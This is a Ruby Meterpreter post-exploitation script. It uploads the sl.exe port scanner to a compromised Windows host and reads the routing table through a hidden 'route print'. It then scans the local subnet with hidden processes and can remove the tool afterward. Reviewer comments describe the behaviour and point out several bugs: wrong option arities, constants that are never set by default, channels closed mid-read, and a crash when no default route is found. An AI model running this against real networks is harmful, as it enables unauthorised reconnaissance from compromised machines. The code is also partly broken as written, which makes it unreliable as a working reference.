- #!/usr/bin/env ruby
- require 'ftools'
- ############################################################
- # This is a Meterpreter script that port-scans the       #
- # network the controlled computer is on,                 #
- # using a port scanner called sl.exe                     #
- # #
- ############################################################
- # If netmask isn't 255.255.255.0 it must work any way #
- ############################################################
- # Tested in Win2003 and WinXP #
- ############################################################
- # Created by Augusto Pereyra aepereyra(at)gmail.com #
- ############################################################
- # Made Awesome by PodJackel, podjackel@gmail.com #
- ############################################################
# Command-line options accepted by this script. Each flag maps to a
# two-element array: a boolean followed by the help text shown in the usage
# output (presumably the boolean marks whether the flag takes a value, as
# with "-r" -- confirm against Rex::Parser::Arguments).
#
# NOTE(review): "-s" and "-d" carry the same `false` as the flag-only options
# even though their help text describes a path and the option loop further
# down reads a value for them.
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [false, "Help menu."],
  "-r" => [true, "To set the range manualy"],
  "-a" => [false, "For automatic lan detection and port scan"],
  "-s" => [false, "Tool Source Path (Default: /pentest/windows-binaries/scanners/sl.exe)"],
  "-d" => [false, "Client Destination Path (Default: %windir%\\system32\\sl.exe)"],
  "-c" => [false, "Delete tool from host after scan"]
)
- #Function for upload the port scanner
# Copies the scanner binary to the remote host through the session's
# file-system API.
#
# dst - path the binary is written to on the remote host (the option help
#       gives %windir%\system32\sl.exe as the intended default).
# src - path of the binary on the operator's machine.
#
# The file named by src is sl.exe, which the original author credits to
# Foundstone. The upload leaves a new executable on disk at dst, an artifact
# that file-creation auditing on that host can record.
#
# Returns whatever the underlying upload_file call returns.
def uploadtool(dst, src)
  print_status("Uploading Portscanner to target")
  remote_files = client.fs.file
  remote_files.upload_file(dst, src)
end
# Deletes the previously uploaded scanner from the remote host.
#
# src - remote path of the file to delete (the callers in this script pass
#       the same path they uploaded to).
#
# Returns whatever the underlying rm call returns.
def removetool(src)
  print_status("Removing Portscanner from target")
  remote_files = client.fs.file
  remote_files.rm(src)
end
- #Function for network autodetection
# Builds a scan range from the remote host's routing table.
#
# Runs `route print` as a hidden, channelized process on the remote host and
# reads the first chunk of output. Every line in that chunk matching
# " 0.0.0.0" replaces the remembered line and closes the channel. The fourth
# whitespace-separated field of the remembered line is then taken
# (presumably the Interface column of the default-route row -- confirm
# against real `route print` output), and its last octet is replaced with 1
# and with 254.
#
# The result always spans .1 to .254 of that address, whatever the actual
# netmask is.
#
# NOTE(review): only the first chunk is inspected, because the method returns
# from inside the read loop. If no line in that chunk matches, the lookup of
# field four yields nil and the split raises NoMethodError. The dots in the
# pattern are unescaped, so they match any character.
#
# The `route print` child process is started on the remote host, so
# process-creation logging there can record it.
#
# Returns a String "a.b.c.1-a.b.c.254", or nil when nothing could be read.
def auto
  route_cmd = client.sys.process.execute("route print", nil, { 'Hidden' => true, 'Channelized' => true })
  default_route = []
  while (chunk = route_cmd.channel.read)
    chunk.each do |line|
      next unless line =~ /( 0.0.0.0)/

      default_route = line.split
      route_cmd.channel.close
    end
    iface = default_route[3]
    bounds = %w[1 254].map do |last_octet|
      octets = iface.split(".")
      octets[3] = last_octet
      octets.join(".")
    end
    return bounds.join("-")
  end
end
- ####################################################################
- #Function for Port Scanning#########################################
- ####################################################################
# Runs the uploaded scanner on the remote host against an IP range and prints
# its output locally.
#
# iprange - range string placed after the scanner's -h flag.
# path    - remote path of the scanner executable.
#
# The session's response timeout is raised to 100 before the scanner starts
# as a hidden, channelized process with the fixed flags written below. Output
# lines are collected in order and written to standard output with puts.
#
# NOTE(review): the channel is closed once per output line, from inside the
# inner loop, and the outer loop then tries to read from it again.
#
# Both arguments are interpolated into the command line unquoted. The scanner
# runs as a child process on the remote host, so process-creation logging
# that captures command lines would record the path and the range.
#
# Returns the Array of collected output lines.
def portscan(iprange, path)
  print_status("Performing portscanning for IP range #{iprange}")
  session = client
  session.response_timeout = 100
  scan = session.sys.process.execute("#{path} -q 1000 -c 500 -h #{iprange}", nil, { 'Hidden' => true, 'Channelized' => true })
  collected = []
  while (chunk = scan.channel.read)
    chunk.each do |line|
      collected << line
      scan.channel.close
    end
  end
  collected.each { |line| puts line }
end
- #####################################################################
- #This is me##########################################################
- #####################################################################
# Prints the two author-credit lines through print_status.
#
# Returns the result of the last print_status call.
def mysign
  credits = [
    "Created by Augusto Pereyra, aepereyra at gmail.com",
    "Made Awesome by PodJackel, podjackel@gmail.com"
  ]
  credits.map { |credit| print_status(credit) }.last
end
- #####################################################################
- # MAIN ############################################################
- #####################################################################
- # Parsing of Options
# Entry point. Parses the options, then does one of three things: scans an
# operator-supplied range (-r), scans an auto-detected range (-a), or prints
# the usage text. When both -a and -r are given, the auto-detected range wins.
range = nil
scan_mode = nil # becomes 2 when -a is given

# Defaults, stored in instance variables.
# NOTE(review): the option handlers and the dispatch below use the constants
# WinPath, ToolPath and Clean, not these instance variables. Nothing in this
# listing reads @WinPath, @ToolPath or @Clean again, and the constants exist
# only if the matching option (-d, -s, -c) was parsed.
@WinPath = client.fs.file.expand_path("%windir%\\system32\\sl.exe")
@ToolPath = "/pentest/windows-binaries/scanners/sl.exe"
@Clean = 0

@@exec_opts.parse(args) do |opt, _idx, val|
  case opt
  when "-a" then scan_mode = 2
  when "-r" then range = val
  when "-d" then WinPath = val
  when "-s" then ToolPath = val
  when "-c" then Clean = 1
  end
end

# The credit banner is printed on every path, before anything else runs.
mysign()
if scan_mode == 2 || !range.nil?
  # Scan path: upload the tool, resolve the range, scan, optionally clean up.
  uploadtool(WinPath, ToolPath)
  range = auto() if scan_mode == 2
  portscan(range, WinPath)
  removetool(WinPath) if Clean == 1
else
  # Neither -a nor -r was supplied: show the usage text.
  print(@@exec_opts.usage)
end